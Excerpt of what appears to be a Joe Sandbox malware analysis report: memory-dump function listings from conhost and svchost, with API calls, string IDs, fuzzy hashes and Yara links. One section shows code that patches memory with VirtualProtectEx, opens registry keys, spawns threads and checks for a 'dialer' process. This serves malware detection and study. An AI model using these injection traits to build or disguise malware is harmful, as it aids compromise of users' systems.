                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: 971f88379b0ec2dc479cbb7992210d2b94cc3b39450e9ecc8c27ef34c3018d5d
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: AAD1F132B24A84AAE711CFB9E5502DC37B1F74579CF004216CE9D97BA9DA34C86BC741
                                                          Function 00000146F6B014A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: 0accb524a0873679f9104482d582f2fd253ed9c1c2239512ae5764dd9e4c6d91
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 68015272520AA0D6D744DFB6F81418A77A0F74AF88F055425DE8D43739EE34C87AC741
                                                          Function 00000146F6B12DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000146F6B12D9B), ref: 00000146F6B12ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000146F6B12D9B), ref: 00000146F6B12F57
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: 0e08e12016bd61defbbe8237d6b1d3d71cbfc1cfc9842c1ad5f8a1bff3c12a03
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: E191E132720650A5F7618F75A5A43ED2BE0F706B8CF144119DE8E676A8DB34CCABC702
                                                          Function 00000146F6B07D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: 94f4ee72015eb53d8fcc1b34effccdff0e82b222a7ef4599b68f71d9d22dbede
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: FA113036720F0089EB00CF70F8653E933A4F71A758F441E21DAAD867A4EF78C5A98381
                                                          Function 00000146F6B02604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: daeb79eab9180174dd6cda0250cfe031a1ee960cb524944bd89cdf5d1fd96e1d
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: C471C43622078156E7789E36AB643EA6F90F786788F442116DD8D43BA9DE34CD1EC701
                                                          Function 00000146F6ADA24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction ID: aaf0f605977017f6335be39714fb249238140626f5eaf0495e7230e2d3c1172b
                                                          • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction Fuzzy Hash: 73614936604B448AEB20DF66E4503DD77A2F345B8CF044215EF8D17BA9DB78D9AAC701
                                                          Function 00000146F6B023F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction ID: 9a31b4c5a1516f225182f315ce7284b607d0523926c9967d3047d3f7b2819423
                                                          • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction Fuzzy Hash: B451D43A22478161E6389A35B7743EA6F51F386788F442015DECD03BADDA35CC6EC745
                                                          Function 00000146F6AE2DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction ID: fe9fec7ab9ab67d6f7eea314dbfc29fe63ecfda1a1cf18b3a3a77534df99a770
                                                          • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction Fuzzy Hash: BA614F31925F4A8DD5639B3BB5762A56718BF733C8F41D307E88F31A71DB18992B8202
                                                          Function 00000146F6B12B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction ID: 647d9609b467ad9abece6d697dccfd433d36a953b604dc58754f4983228e35d4
                                                          • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction Fuzzy Hash: F441C272324A8096DB20CF35F5543EA77A0F799798F804121EE8D877A8EB7CC85AC741
                                                          Function 00000146F6B098D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction ID: a19e81f3d3b980514e70aad81d9aafb2a67226aeb0de1b2af39fb4af706927c4
                                                          • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction Fuzzy Hash: D5113332214B4492EB218F25F55039977E5F789B98F585224DECC07769EF3CC966C700
                                                          Function 00000146F6AD7786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction ID: 75ef0eed0b0ff797fa431e9363a07a0780fe975ba2a52a702e3b0b14ed14720e
                                                          • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction Fuzzy Hash: E2E086B1641B44D0DF018F32F4A02D833A1DB69B58F4891229D9C06321FA3CD5FEC301
                                                          Function 00000146F6AD77E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction ID: e9a901b4307bf7cab164b2017e7068c222a50653ba175f00ac1707d3e9de68d2
                                                          • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction Fuzzy Hash: 97E0E6B1651B44D0DF118F72F4A01D87365E769B58B8891229D9C46365EA3CD5FAC301
                                                          Function 00000146F6AD78EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction ID: 6738c7cbd96f0ca6ddeb063a1b1725e88f752d05ef666f3bcb9d4725e6cc3bef
                                                          • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction Fuzzy Hash: 75D06772611A8495EE10EB24E8A53C96335F3A570CF904511918D41975DF6DCEAFC741
                                                          Function 00000146F6B01C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction ID: 1c2a3e9e94ed130e502cac772cf8fdaa456b5085b5904982dd0b37df7485c862
                                                          • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction Fuzzy Hash: F211C431A21B5091EB14CBB6B41825967A0F78AFC4F599024DE8D57735EF38C867C300
                                                          Function 00000146F6B01268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction ID: fb58cfac5261358ad25856e7c583847c86ad9308e93c1e4711175c24236feb05
                                                          • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction Fuzzy Hash: 23E0393162161086E7048B62E828389B7E1EB8BB0AF059024898907361EF7D88AED741
                                                          Function 00000146F6B01000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: 33772ef4fba7ad59b0bdb4136208113b171a939d665c33968b9924e27a1cb50d
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: D4E0ED7162155096E7089B62E818299B7A1FB8BB1AF459024C94907321EE3888BED611

                                                          Executed Functions

                                                          Function 0000014E41FD3620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 0000014E41FD3639
                                                          • PathFindFileNameW.SHLWAPI ref: 0000014E41FD3648
                                                            • Part of subcall function 0000014E41FD3C74: StrCmpNIW.KERNELBASE(?,?,?,0000014E41FD254B), ref: 0000014E41FD3C8C
                                                            • Part of subcall function 0000014E41FD3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3BCE
                                                            • Part of subcall function 0000014E41FD3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3BFC
                                                            • Part of subcall function 0000014E41FD3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3C1E
                                                            • Part of subcall function 0000014E41FD3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3C39
                                                            • Part of subcall function 0000014E41FD3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014E41FD365F), ref: 0000014E41FD3C5A
                                                          • CreateThread.KERNELBASE ref: 0000014E41FD368F
                                                            • Part of subcall function 0000014E41FD1D40: GetCurrentThread.KERNEL32 ref: 0000014E41FD1D4B
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000002.3450162698.0000014E41FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                          • Associated: 00000045.00000002.3450007037.0000014E41FD0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450405001.0000014E41FE6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450622589.0000014E41FF1000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450819633.0000014E41FF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3451030485.0000014E41FF9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_2_14e41fd0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                          • String ID:
                                                          • API String ID: 1683269324-0
                                                          • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction ID: c4e3f1745bf8363e0ff9384758f9882cad879df2634dc25eb8363bf84f8cff4a
                                                          • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                          • Instruction Fuzzy Hash: B71148F071464186FF60AB60AA0DBFDA7E1BFA4755F5C41269607C16F5EFBCC00A8A21
                                                          Function 0000014E41FD3C74 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 18 14e41fd3c74-14e41fd3c7f 19 14e41fd3c99-14e41fd3ca0 18->19 20 14e41fd3c81-14e41fd3c94 StrCmpNIW 18->20 20->19 21 14e41fd3c96 20->21 21->19
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000002.3450162698.0000014E41FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                          • Associated: 00000045.00000002.3450007037.0000014E41FD0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450405001.0000014E41FE6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450622589.0000014E41FF1000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3450819633.0000014E41FF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000045.00000002.3451030485.0000014E41FF9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_2_14e41fd0000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dialer
                                                          • API String ID: 0-3528709123
                                                          • Opcode ID: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                          • Instruction ID: 2c0cbaed9e2be54d8f34c9294cea5bd4d7cf0b86e6eec5f607e76d21ac988424
                                                          • Opcode Fuzzy Hash: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                          • Instruction Fuzzy Hash: 32D05EB0311B498AFF349FA288CC6F0A3D0BF04719F8D40208A0181624D719C98E8630
                                                          Function 0000014E41FA2AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000045.00000003.2231913807.0000014E41FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_69_3_14e41fa0000_svchost.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction ID: a8755421c84c26c3c9157201e2a2b6b915c202e797dbc96cdedb25e74d6b8551
                                                          • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                          • Instruction Fuzzy Hash: 7891117270169087EF648F95D048BA9B3D1FB54BE4F5C81249F0A87BA9DA38D853C760
                                                          Function 0000014E41FD1AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0000014E41FD1628: GetProcessHeap.KERNEL32 ref: 0000014E41FD1633
                                                            • Part of subcall function 0000014E41FD1628: HeapAlloc.KERNEL32 ref: 0000014E41FD1642
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16B2
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16DF
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD16F9
                                                            • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1719
                                                            • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1734
